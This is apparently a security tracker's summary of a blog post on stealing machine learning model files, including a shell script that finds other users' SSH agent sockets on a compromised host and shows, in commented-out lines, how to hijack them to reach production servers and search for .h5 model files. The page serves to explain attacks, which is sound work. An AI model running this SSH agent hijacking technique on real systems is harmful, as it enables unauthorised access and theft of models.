Machine Learning Attack Series: Stealing a model file
Summary
Attackers can steal machine learning model files either directly, by compromising a system and locating the model files themselves (often Keras/TensorFlow .h5 files), or indirectly, via model stealing, where an attacker reconstructs a similar model by querying the target. One specific direct attack vector is SSH agent hijacking: on a compromised machine, an attacker reuses the decrypted SSH keys held in memory by a running ssh-agent, gaining access to production systems that host model files without ever needing the keys' passphrases.
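The SSH agent hijacking step described above can be sketched as a short shell recon script. This is a minimal illustration, assuming the default OpenSSH socket layout (/tmp/ssh-XXXXXXXXXX/agent.<pid>) and sufficient privileges on the compromised host; "prod-host" in the comments is a hypothetical target name, not from the original post.

```shell
#!/bin/sh
# Sketch: hijacking SSH agents on a compromised host to reach systems
# holding model files. Assumes root (or same-uid) access and default
# OpenSSH agent socket paths; adapt paths for other configurations.

# 1. Enumerate live agent sockets left behind by logged-in users.
for sock in /tmp/ssh-*/agent.*; do
  [ -S "$sock" ] || continue        # skip if the glob matched nothing
  echo "candidate agent socket: $sock"
  # 2. Point an ssh client at the victim's agent (commented out here):
  #    SSH_AUTH_SOCK="$sock" ssh-add -l           # list loaded keys
  #    SSH_AUTH_SOCK="$sock" ssh prod-host \
  #      'find / -name "*.h5" 2>/dev/null'        # hunt for model files
done
echo "done enumerating agent sockets"
```

Because the agent already holds the decrypted private keys in memory, the attacker never needs the passphrase; setting SSH_AUTH_SOCK is enough to ride the victim's credentials.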
Classification
Affected Vendors
Related Issues
Original source: https://embracethered.com/blog/posts/2020/husky-ai-machine-learning-model-stealing/
First tracked: February 12, 2026 at 02:20 PM
Classified by LLM (prompt v3) · confidence: 75%